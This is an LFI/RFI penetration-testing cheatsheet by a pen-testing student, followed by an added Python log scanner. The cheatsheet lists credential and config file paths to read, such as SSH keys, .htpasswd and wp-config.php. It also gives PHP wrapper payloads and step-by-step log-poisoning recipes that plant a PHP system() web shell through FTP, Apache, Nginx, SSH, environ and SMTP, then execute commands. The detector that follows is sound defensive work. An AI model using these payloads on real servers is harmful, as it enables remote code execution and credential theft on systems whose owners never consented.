LFI / RFI Cheatsheet

Passwords & Credentials

SSH

/var/lib/username/.ssh/id_rsa
/home/username/.ssh/id_rsa

Apache

/var/log/apache/access.log
/var/log/apache2/access.log
/var/log/httpd/access_log
/var/log/apache/error.log
/var/log/apache2/error.log
/var/log/httpd/error_log
/etc/apache2/htpasswd
/etc/apache2/.htpasswd
/etc/apache/.htpasswd
/etc/apache2/apache2.conf

CMS

WordPress: /var/www/html/wp-config.php
Joomla: /var/www/configuration.php
Dolphin: /var/www/html/inc/header.inc.php
Drupal: /var/www/html/sites/default/settings.php

XAMPP

C:/xampp/security/webdav.htpasswd

C:/xampp/apache/conf/httpd.conf

C:/xampp/apache/logs/access.log

PHP Wrapper

php://filter/convert.base64-encode/resource=

file=expect://whoami

php://input&cmd=whoami

Log Poisoning

FTP

Firstly, you need to be able to access:

../../../../../../../../var/log/vsftpd.log

If this is possible, attempt to log in:

ftp 192.168.x.x

Supply the following name:

Name: <?php system($_GET['cmd']); ?>

Exit and attempt the below execution:

../../../../../../../../var/log/vsftpd.log&cmd=whoami

Apache2 I

Firstly, you need to be able to access:

../../../../../../../../var/log/apache2/access.log

If this is possible, attempt to poison:

nc 192.168.xx.xx 80

Enter the following and press enter:

<?php system($_GET['cmd']); ?>

Exit and attempt the below execution:

../../../../../../../../var/log/apache2/access.log&cmd=whoami

Apache2 II

Firstly, you need to be able to access:

../../../../../../../../var/log/apache2/access.log

If this is possible, attempt to poison within the User-Agent:

<?php system($_GET['cmd']); ?>

Exit and attempt the below execution:

../../../../../../../../var/log/apache2/access.log&cmd=whoami

SSH

Firstly, you need to be able to access:

../../../../../../../../var/log/auth.log

Attempt to log in using the following:

ssh '<?php echo system($_GET["cmd"]); exit; ?>'@192.168.x.x

Exit and attempt the below execution:

../../../../../../../../var/log/auth.log&cmd=whoami

Nginx

Firstly, you need to be able to access:

../../../../../../../../var/log/nginx/access.log

Attempt to inject the following:

http://192.168.x.x/file.php?file=<?php system($_GET['cmd']); ?>

Attempt the below execution:

../../../../../../../../var/log/nginx/error.log&cmd=whoami

Environ

Firstly, you need to be able to access:

../../../../../../../../proc/self/environ

If this is possible, attempt to poison within the User-Agent:

<?php system($_GET['cmd']); ?>

Exit and attempt the below execution:

../../../../../../../../proc/self/environ&cmd=whoami

SMTP

First get a username (from /etc/passwd).

telnet 192.168.x.x 25

Enter the following:

EHLO andy

VRFY username@localhost

mail from: andy@hack.com

rcpt to: username@localhost

data

Subject: owned

<?php echo system($_REQUEST['cmd']); ?>

Press Enter, type a single dot (.) on its own line, then press Enter again.

Exit and attempt the below execution:

../../../../../../../../var/mail/username&cmd=whoami
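
As an added defensive example (not part of the original post), the Python sketch below flags the traces these techniques leave in logs: PHP open tags stored in a log field, PHP wrappers in request parameters, and traversal sequences that reach the file locations listed on this page. The log lines, addresses and finding labels are constructed for illustration.

```python
import re
from urllib.parse import unquote

# File locations this cheatsheet lists (logs, environ, mail, keys, configs).
SENSITIVE = ("/var/log/", "/proc/self/environ", "/var/mail/", "/.ssh/",
             ".htpasswd", "wp-config.php", "/xampp/")
PHP_TAG = re.compile(r"<\?(php|=)", re.I)       # PHP open tag stored in a log field
TRAVERSAL = re.compile(r"(\.\.[/\\]){2,}")      # two or more ../ (or ..\) in a row
WRAPPER = re.compile(r"(php://(filter|input)|expect://)", re.I)

def decode(text, rounds=3):
    """Undo up to `rounds` layers of URL encoding so %252e%252e%252f reads as ../"""
    for _ in range(rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text

def classify(line):
    """Return the set of finding labels for one log line."""
    text = decode(line)
    findings = set()
    if PHP_TAG.search(text):
        findings.add("php-tag-in-log")
    if WRAPPER.search(text):
        findings.add("php-wrapper")
    if TRAVERSAL.search(text):
        hit = any(target in text.lower() for target in SENSITIVE)
        findings.add("traversal-to-sensitive-file" if hit else "traversal")
    return findings

def scan(lines):
    """Return (line_number, sorted findings) for every line with a finding."""
    return [(n, sorted(f)) for n, line in enumerate(lines, 1) if (f := classify(line))]

# Constructed sample lines: documentation addresses, inert PHP comment as tag body.
SAMPLE = [
    '203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?page=about HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Oct/2023:13:55:40 +0000] "GET /index.php?file=..%2f..%2f..%2fvar%2flog%2fapache2%2faccess.log HTTP/1.1" 200 9000 "-" "curl/8.0"',
    '203.0.113.7 - - [10/Oct/2023:13:55:44 +0000] "GET / HTTP/1.1" 200 512 "-" "<?php /* constructed */ ?>"',
    'Oct 10 13:56:01 web1 sshd[1234]: Invalid user <?php /* constructed */ ?> from 203.0.113.7 port 51234',
    '203.0.113.7 - - [10/Oct/2023:13:56:10 +0000] "GET /index.php?file=php://filter/convert.base64-encode/resource=index.php HTTP/1.1" 200 700 "-" "curl/8.0"',
    '203.0.113.7 - - [10/Oct/2023:13:56:15 +0000] "GET /index.php?file=%252e%252e%252f%252e%252e%252fproc%252fself%252fenviron HTTP/1.1" 200 300 "-" "curl/8.0"',
]

if __name__ == "__main__":
    for number, labels in scan(SAMPLE):
        print(number, labels)
```

A PHP open tag in any log an include can reach is the signal to prioritise, since the poisoning steps above all depend on one being written there first.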

Andy Gregg

Pen Testing Student
